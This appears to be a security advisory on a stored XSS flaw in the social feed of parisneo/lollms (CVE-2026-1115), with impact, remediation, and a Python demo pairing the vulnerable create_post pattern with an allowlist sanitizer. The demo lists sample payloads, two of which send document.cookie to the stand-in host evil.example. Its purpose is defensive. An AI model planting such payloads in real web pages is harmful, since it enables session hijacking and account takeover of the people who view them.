Critical (9.6)

CVE-2026-1115: parisneo/lollms Stored XSS

Stored XSS in the social feature of parisneo/lollms (the create_post function) lets an unprivileged attacker run JavaScript in the browser of anyone who views the feed, including administrators, hijacking their sessions and taking over accounts. Wormable. CVSS 9.6. Upgrade to v2.2.0 immediately.

Affected: parisneo/lollms, versions prior to 2.2.0

Patch now - CVE-2026-1115 is a critical stored cross-site scripting (XSS) vulnerability in parisneo/lollms versions prior to 2.2.0 that lets an unprivileged attacker hijack any viewing user’s browser session, including administrators, by posting a malicious social feed entry.

Overview

A critical stored Cross-Site Scripting (XSS) vulnerability, CVE-2026-1115, was identified in the parisneo/lollms application. The flaw resides in the platform's social feature, specifically within the create_post function. This function failed to sanitize user input before storing it in the database, so malicious JavaScript is persisted with the post and served to every user who later views it.

Technical Details

The vulnerability is located in backend/routers/social/__init__.py. When a user creates a post, the submitted content is assigned directly to the DBPost model without any validation or sanitization, so HTML and script markup is persisted exactly as sent. When the Home Feed renders the post, the browser interprets that markup and the embedded script runs in the session of every user who views it. The attacker needs nothing beyond the ability to create a post, and the victim needs only to load the feed, which makes exploitation straightforward.
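The following is an added Python sketch of the pattern just described; it is not code from the lollms project. It places a create_post that assigns the request body straight to the post model beside one that runs the content through an allowlist sanitizer before storage, then renders both feeds. The Post class stands in for DBPost, a plain list stands in for the database table, and the payload strings are constructed for the demo.

```python
# Added example, not lollms project code: the unsanitized create_post pattern
# beside a sanitizing one. Post stands in for DBPost, a plain list for the
# database table, and the payloads are constructed for the demo.
import html
from dataclasses import dataclass
from html.parser import HTMLParser

PAYLOADS = [  # constructed payloads of the kind a stored-XSS post carries
    '<script>fetch("//evil.example/c?" + document.cookie)</script>',
    '<img src=x onerror="fetch(\'//evil.example/c?\' + document.cookie)">',
    '<a href="javascript:alert(document.domain)">read more</a>',
]

@dataclass
class Post:  # stand-in for the DBPost model (assumption)
    author_id: int
    content: str

def create_post_vulnerable(feed: list, author_id: int, content: str) -> Post:
    """Mirrors the flaw: the request body is assigned straight to the model."""
    post = Post(author_id=author_id, content=content)
    feed.append(post)
    return post

class AllowlistSanitizer(HTMLParser):
    """Rebuilds a fragment keeping only allowlisted tags/attributes. Other tags
    are dropped (their text survives, escaped), other attributes and unsafe
    hrefs are dropped, and allowed tags left open are closed."""
    ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "code", "pre", "a"}
    VOID_TAGS = {"br"}
    ALLOWED_ATTRS = {"a": {"href"}}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.open_tags = [], []

    @staticmethod
    def _safe_href(value):
        if value is None:
            return False
        # Strip whitespace/control chars so "java\tscript:" is caught; allow http(s)
        # and same-origin paths but not protocol-relative "//host".
        compact = "".join(c for c in value if c.isprintable() and not c.isspace()).lower()
        return compact.startswith(("http://", "https://", "/")) and not compact.startswith("//")

    def handle_starttag(self, tag, attrs):
        if tag not in self.ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name not in self.ALLOWED_ATTRS.get(tag, set()):
                continue  # drops onerror=, style=, srcdoc=, ...
            if name == "href" and not self._safe_href(value):
                continue
            kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in self.VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag not in self.open_tags:
            return
        while self.open_tags:  # also closes anything left open inside it
            closing = self.open_tags.pop()
            self.out.append(f"</{closing}>")
            if closing == tag:
                break

    def handle_data(self, data):
        # <script>/<style> bodies arrive here too and leave as inert text.
        self.out.append(html.escape(data, quote=False))

    def result(self) -> str:
        self.close()  # flush buffered text before closing open tags
        while self.open_tags:
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)

def sanitize(fragment: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    return parser.result()

def create_post_fixed(feed: list, author_id: int, content: str, max_len: int = 10_000) -> Post:
    """Validates and sanitizes before the content ever reaches the model."""
    if len(content) > max_len:
        raise ValueError("post too long")
    post = Post(author_id=author_id, content=sanitize(content))
    feed.append(post)
    return post

def render_feed(feed: list) -> str:
    """Feed rendered as HTML; on the vulnerable path the payload lands here verbatim."""
    return "\n".join(f'<div class="post" data-author="{p.author_id}">{p.content}</div>' for p in feed)

def contains_active_content(rendered: str) -> bool:
    # Crude demo oracle (not a sanitizer): script tag, event handler or javascript: URL.
    low = rendered.lower()
    return "<script" in low or "onerror=" in low or "javascript:" in low
```

Feeding each payload through create_post_vulnerable and create_post_fixed and rendering both lists shows the difference: the vulnerable feed contains the script tag, the event handler and the javascript: link verbatim, while the fixed feed holds only inert text and a bare anchor. The sanitizer is hand-rolled here to keep the example self-contained; in production use a maintained allowlist library such as nh3, keep output encoding at render time as the primary control, and add a Content-Security-Policy that forbids inline script as defense in depth.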

Impact and Risks

With a CVSS score of 9.6, this vulnerability poses a severe risk. An attacker crafts a post containing malicious JavaScript; when other users, including administrators, view it, the script executes in their browser session with their privileges. This can lead directly to:

  • Account takeover through session hijacking. If the session cookie is not marked HttpOnly the script can exfiltrate it outright; even if it is, the script can issue authenticated requests from the victim's browser, so HttpOnly limits the damage but does not prevent takeover.
  • Unauthorized actions performed on behalf of the victim, including administrative changes when the viewer is an admin.
  • Wormable attacks where the injected script creates further malicious posts from each victim's account, so the payload spreads automatically.

Given the social nature of the feature, a single compromised post can rapidly affect every user who opens the feed.

Remediation

The issue is fixed in version 2.2.0 of parisneo/lollms; upgrade all affected instances immediately. No code-level workaround is available. Short of upgrading, the only way to block the attack vector is to disable the social feature or restrict post creation to trusted accounts, which may not be practical for every deployment. As defense in depth, a Content-Security-Policy that forbids inline script, served by the application or by the reverse proxy in front of it, reduces the impact of injected markup but does not remove the flaw. After upgrading, review posts already in the database for injected markup, since a fix applied at creation time does not retroactively clean rows stored before the patch; if any are found, treat the sessions of users who viewed them as potentially compromised and invalidate them.

Security Insight

This vulnerability highlights the persistent risk of XSS in user-generated content features, which are often shipped quickly. It mirrors a common pattern seen in other platforms where input sanitization and output encoding are an afterthought rather than a core design principle. The high severity underscores that even non-RCE flaws in interactive components can be critically damaging: script running in an administrator's browser is, in practice, administrator access to the application, enabling privilege escalation and lateral movement within it.
